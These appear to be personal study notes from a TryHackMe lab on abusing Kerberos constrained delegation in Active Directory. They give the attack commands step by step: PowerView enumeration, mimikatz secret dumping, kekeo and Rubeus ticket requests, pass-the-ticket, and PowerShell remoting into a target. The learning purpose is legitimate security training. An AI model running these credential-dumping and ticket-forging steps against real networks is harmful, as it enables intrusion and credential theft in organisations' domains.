Kerberos delegation

Note that "Kerberos delegation" and "Permission delegation" are 2 different terms. When "AD delegation" is mentioned, it usually refers to "Kerberos delegation".

Resources

  1. Constrained delegation abuse

LogoConstrained Delegation Abuse | GhostPackdocs.specterops.io

  1. PowerShell remoting

LogoPowerShell remoting - PowerShellMicrosoftLearn

  1. PowerView

LogoPowerSploit/PowerView.ps1 at master · PowerShellMafia/PowerSploitGitHub

Important notice

The examples shown below uses the kekeo tool, which is not maintained anymore and may not work as expected. However, the command examples are used to illustrate the basic workflow of the process in a lab environment (TryHackMe exploiting AD room), along with explanations based on my understanding.

Rubeus is a tool that is heavily adapted from the kekeo project, and provides similar functionalities. For all the commands shown in kekeo, I aim to provide the equivalent commands; in terms of functionality, in Rubeus.

Constrained vs Unconstrained delegation

  1. Unconstrained

  • service accounts have no limits on the delegation

  • this means that they are able to access any services

  1. Constrained

  • service accounts can only be delegated to certain specified services

  • this means that they can only access certain controlled services

Exploitation steps

Step 1

Given that we have breached a machine, and gained administrative access, we can first try to retrieve credentials of any service accounts that are present on the current host. To achieve this, we can use cmdlets from PowerSploit: 

PS C:\> Import-Module C:\dir\to\PowerSploit\PowerView.ps1
PS C:\> Get-NetUser -TrustedToAuth

Next, we can use mimikatz to dump the secrets:

mimikatz # token::elevate
mimikatz # lsadump::secrets

Step 2

Now that we have the secrets (password), we can use it to retrieve the Ticket Granting Ticket (TGT). Next, we can generate the Ticket Granting Service (TGS) for a particular service that our identified service account (step 1) can delegate.

kekeo # tgt::ask /user:<username> /domain:<domain> /password:<password>

C:\> rubeus.exe s4u ... 
kekeo # tgs::s4u /tgt:<TGT> /user:<username> /service:<servicename>

C:\> rubeus.exe ...

Step 3

Now that we have retrieved the Ticket Granting Service (TGS) for our desired service, we can use it to perform a Pass-the-Ticket attack, which will allow us to authenticate to the service we have identified earlier.

mimikatz # privilege debug
mimikatz # kerberos::ptt ...
mimikatz # exit

Exploiting PowerShell remoting

According to the TryHackMe exploiting AD room, PowerShell remoting uses the HTTP and WSMAN services as well. This means that we can use the TGT we have retrieved to create TGS for both HTTP and WSMAN, before performing a Pass-the-Ticket attack, which will allow us to gain a remote session on a target machine.

Note that we have to generate the TGS for both the HTTP and WSMAN services

mimikatz # kerberos::ptt TGS_http_xxxx
mimikatz # kerberos::ptt TGS_wsman_xxx

mimikatz # exit

Refer to the "PowerShell remoting" resource in the Resources section above

PS C:\> New-PSSession -ComputerName <computer_name>
...

PS C:\> Enter-PSSession -ComputerName <computer_name>
[xxxx]: PS C:\Users\<username> whoami
user_xxx

PreviousPermission delegationNextTools

Last updated